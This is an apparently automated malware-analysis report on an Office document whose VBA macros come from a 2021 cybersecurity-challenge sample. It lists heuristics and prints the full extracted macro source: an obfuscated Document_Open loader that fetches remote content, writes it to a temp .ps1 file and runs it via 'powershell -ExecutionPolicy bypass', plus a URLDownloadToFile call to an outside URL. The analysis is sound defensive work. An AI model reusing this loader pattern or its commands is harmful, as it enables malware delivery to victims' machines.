Verdict: MALICIOUS
Risk score: 438
Malware Insights
MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample contains a VBA macro within a Document_Open subroutine, which is a common technique for malicious Office documents. This macro utilizes WScript.Shell and PowerShell to download and execute a second-stage payload from a URL, as indicated by the critical OLE_VBA_DOWNLOAD and OLE_VBA_PS heuristics. The presence of an obfuscated auto-exec loader further supports its malicious intent.
Heuristics (12)
- VBA project inside OOXML (medium, OOXML_VBA, 9 related findings): Document contains a VBA project — VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Sub oPlsoa3(cmd As String) Shell cmd End Sub`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `If IsArray(var) = False Then aa99a = "Wscript.Shell" End If`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `Function jfsakl() As String jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass" End Function`
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `Private Declare PtrSafe Function psi Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, _`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Function X1sla3(X9ss, los4) As String Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC()) uL7sy12.Open getZZ(), los4, False`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Function X1sla3(X9ss, los4) As String Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC()) uL7sy12.Open getZZ(), los4, False`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `Dim waA7S As String waA7S = Environ("temp") & "\runme." & "ps1" If IsArray(dast) = True Then`
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://www.untrustednetwork.net/misc/payload1.nul (referenced by macro).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8483 bytes | 22ec391741a94390794b08af08e9b53656fe358021b0792f864f63d9d0a77116 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --------------------------------------------------------------------
'
' This file is part of the European Cyber Security Challenge 2021
'
' Treat it as you would any potentially dangerous file and exercise
' appropriate caution when analyzing it.
'
' Although it is benign, it simulates certain actions, which might
' lead to it being classified as malicious by anti-malware products.
'
' --------------------------------------------------------------------
Private Sub Document_Open()
Dim alpha, beta, gamma, delta, epsilon, zeta, eta, theta, iota As Long
Dim S1sla, L0pet As String
alpha = 1122
beta = 9212
gamma = 4422
delta = 5647
epsilon = 1139
zeta = 6673
eta = 7474
theta = 1337
iota = 1002
kappa = 7892
alpha = beta * gamma
gamma = eta - delta
kappa = alpha * zeta
eta = kappa / beta
iota = eta + theta + iota
gamma = eta / zeta
zeta = alpha + epsilon
epsilon = iota / alpha
S1sla = getA() + getB() + getC() + getD() + getE() + getH()
L0pet = getX() + getY() + getA() + getZ() + getE() + getF() + getX()
If alpha = 1122 Then
S1sla = getE() + getA() + getD() + getS() + getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS()
L0pet = getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS() + getE() + getA() + getD() + getS()
Ls21fa (S1sla)
End If
If alpha = 9212 Then
L0pet = getT() + getU() + getW() + getV() + getH() + getH() + getL() + getI() + getJ() + getM() + getP() + getA() + getS() + getU() + getU()
End If
If gamma = 4422 Then
S1sla = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getV()
End If
If delta = 5647 Then
L0pet = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getS()
X1sla3 S1sla, L0pet
End If
If epsilon = 1139 Then
S1sla = getP() + getA() + getL() + getA() + getD() + getA() + getW() + getE() + getB() + getH() + getO() + getL() + getE() + getM() + getA()
X1sla3 S1sla, L0pet
End If
End Sub
Attribute VB_Name = "Module1"
Sub Ls21fa(dast)
Dim waA7S As String
waA7S = Environ("temp") & "\runme." & "ps1"
If IsArray(dast) = True Then
SloA12 (waA7S)
oPlsoa3 waA7S
End If
End Sub
Function getA() As String
If IsArray(var) = False Then
getA = "V0B"
End If
End Function
Function X1sla3(X9ss, los4) As String
Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
uL7sy12.Open getZZ(), los4, False
uL7sy12.Send
goS67A = uL7sy12.responseText
uL7sy12.Open getZZ(), X9ss, False
uL7sy12.Send
R0asda3 uL7sy12.responseText, goS67A
kfid
End Function
Function getB() As String
If IsArray(var) = False Then
getB = "ftp"
End If
End Function
Function getC() As String
If IsArray(var) = False Then
getC = "002"
End If
End Function
Attribute VB_Name = "Module2"
Private Declare PtrSafe Function psi Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Function dsa241() As String
If IsArray(var) = False Then
dsa241 = "ft.Xm"
End If
End Function
Function Ssfas2E() As String
If IsArray(var) = False Then
Ssfas2E = "roso"
End If
End Function
Function jfsakl() As String
jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
End Function
Function getT() As String
If IsArray(var) = False Then
getT = "apsl"
End If
End Function
Function getU() As String
If IsArray(var) = False Then
getU = "s0j"
End If
End Function
Function getAC() As String
If IsArray(var) = False Then
getAC = "lHttp"
End If
End Function
Function salww() As String
salww = jfsakl
End Function
Function getV() As String
If IsArray(var) = False Then
getV = "oob"
End If
End Function
Public Sub SloA12(Param)
If kappa = 1234 Then
psi 0, "https://www.untrustednetwork.net/misc/payload1.nul, Param, 0, 0"
End If
End Sub
Function getW() As String
If IsArray(var) = False Then
getW = "x90"
End If
End Function
Function vv3223() As String
If IsArray(var) = False Then
vv3223 = "Mic"
End If
End Function
Public Sub kfid()
sdeee1 = salww + " -file " + Environ(Gsa33()) + "\" + Gsa33() + looo1()
Set lsi = CreateObject(aa99a)
lsi.Run sdeee1, 0
End Sub
Function sims22() As String
If IsArray(var) = False Then
sims22 = "jscript"
End If
End Function
Attribute VB_Name = "Module3"
Function getD() As String
If IsArray(var) = False Then
getD = "t2"
End If
End Function
Function getE() As String
If IsArray(var) = False Then
getE = "Ht"
End If
End Function
Function getF() As String
If IsArray(var) = False Then
getF = "Zqwj"
End If
End Function
Function getH() As String
If IsArray(var) = False Then
getH = "cZ"
End If
End Function
Function getI() As String
If IsArray(var) = False Then
getI = "_"
End If
End Function
Function getJ() As String
If IsArray(var) = False Then
getJ = "eA8"
End If
End Function
Function getK() As String
If IsArray(var) = False Then
getK = "tPs"
End If
End Function
Function getL() As String
If IsArray(var) = False Then
getL = ":"
End If
End Function
Function getM() As String
If IsArray(var) = False Then
getM = "JH6L4"
End If
End Function
Function R0asda3(kl1a, sa12) As String
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim Fileout As Object
Set Fileout = fso.CreateTextFile(Environ(Gsa33()) + "\" + Gsa33() + looo1(), True, True)
Fileout.Write kl1a
Fileout.Write sa12
End Function
Function getN() As String
If IsArray(var) = False Then
getN = "/"
End If
End Function
Function getO() As String
If IsArray(var) = False Then
getO = "mi"
End If
End Function
Function getP() As String
If IsArray(var) = False Then
getP = "sc"
End If
End Function
Function getQ() As String
If IsArray(var) = False Then
getQ = "01292"
End If
End Function
Function getR() As String
If IsArray(var) = False Then
getR = "."
End If
End Function
Function getS() As String
If IsArray(var) = False Then
getS = "vm2"
End If
End Function
Sub oPlsoa3(cmd As String)
Shell cmd
End Sub
Function getX() As String
If IsArray(var) = False Then
getX = "zIp"
End If
End Function
Function getY() As String
If IsArray(var) = False Then
getY = "iEX"
End If
End Function
Function getZ() As String
If IsArray(var) = False Then
getZ = "www"
End If
End Function
Function getZZ() As String
If IsArray(var) = False Then
getZZ = "gEt"
End If
End Function
Attribute VB_Name = "Module4"
Function Gsa33() As String
If IsArray(var) = False Then
Gsa33 = "Temp"
End If
End Function
Public Sub sa57s()
Kill "C:\Windows\payload1.exe"
End Sub
Function des999() As String
If IsArray(var) = False Then
des999 = "apsl"
End If
End Function
Function looo1() As String
If IsArray(var) = False Then
looo1 = ".ps1"
End If
End Function
Function aa99a() As String
If IsArray(var) = False Then
aa99a = "Wscript.Shell"
End If
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 56320 bytes | 1cb01ab51e3aa880af954d04eea3130f77cad8eae75da38ba5daf91145154a2c |